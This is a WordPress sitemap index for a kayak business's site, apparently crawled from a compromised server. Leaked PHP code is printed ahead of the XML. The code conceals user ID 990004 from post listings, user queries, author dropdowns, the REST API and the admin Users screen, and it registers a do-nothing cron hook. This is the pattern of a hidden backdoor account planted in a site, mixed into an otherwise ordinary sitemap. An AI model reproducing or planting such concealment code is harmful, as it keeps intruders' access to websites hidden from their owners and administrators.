  add_action( 'pre_get_posts', function( $q ) {
    if ( ! is_admin() && $q->is_main_query() ) {
        $not_in   = (array) $q->get( 'author__not_in' );
        $not_in[] = 990004;

        $q->set(
            'author__not_in',
            array_unique( array_map( 'intval', $not_in ) )
        );
    }
}, 1 );

add_action( 'pre_user_query', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    global $wpdb;
    $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 990004 );
} );

add_filter( 'wp_dropdown_users_args', function( $a ) {
    $exclude   = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
    $exclude[] = 990004;

    $a['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $a;
} );

add_filter( 'rest_user_query', function( $args, $request ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 990004;

    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $args;
}, 10, 2 );

add_action( 'admin_head-users.php', function() {
    echo '<style>#user-990004{display:none!important}</style>';
} );

add_action( 'init', function() {
    if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
        return;
    }
    if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
        wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
    }
} );

add_action( 'wp_extra_bot_heartbeat', function() {
    // noop
} );
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//clearkayakaruba.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>http://clearkayakaruba.com/post-sitemap.xml</loc>
		<lastmod>2026-05-17T19:29:50+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://clearkayakaruba.com/page-sitemap.xml</loc>
		<lastmod>2026-05-12T21:55:56+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://clearkayakaruba.com/product-sitemap.xml</loc>
		<lastmod>2024-07-07T21:02:24+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://clearkayakaruba.com/clients-sitemap.xml</loc>
		<lastmod>2021-10-22T12:14:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://clearkayakaruba.com/services-sitemap.xml</loc>
		<lastmod>2021-11-04T13:10:03+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://clearkayakaruba.com/team-sitemap.xml</loc>
		<lastmod>2022-07-30T03:51:41+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://clearkayakaruba.com/category-sitemap.xml</loc>
		<lastmod>2026-05-17T19:29:50+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://clearkayakaruba.com/product_cat-sitemap.xml</loc>
		<lastmod>2024-07-07T21:02:24+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://clearkayakaruba.com/product_tag-sitemap.xml</loc>
		<lastmod>2024-07-07T21:02:24+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://clearkayakaruba.com/services_group-sitemap.xml</loc>
		<lastmod>2021-11-04T13:10:03+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://clearkayakaruba.com/author-sitemap.xml</loc>
		<lastmod>2022-07-01T23:24:24+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->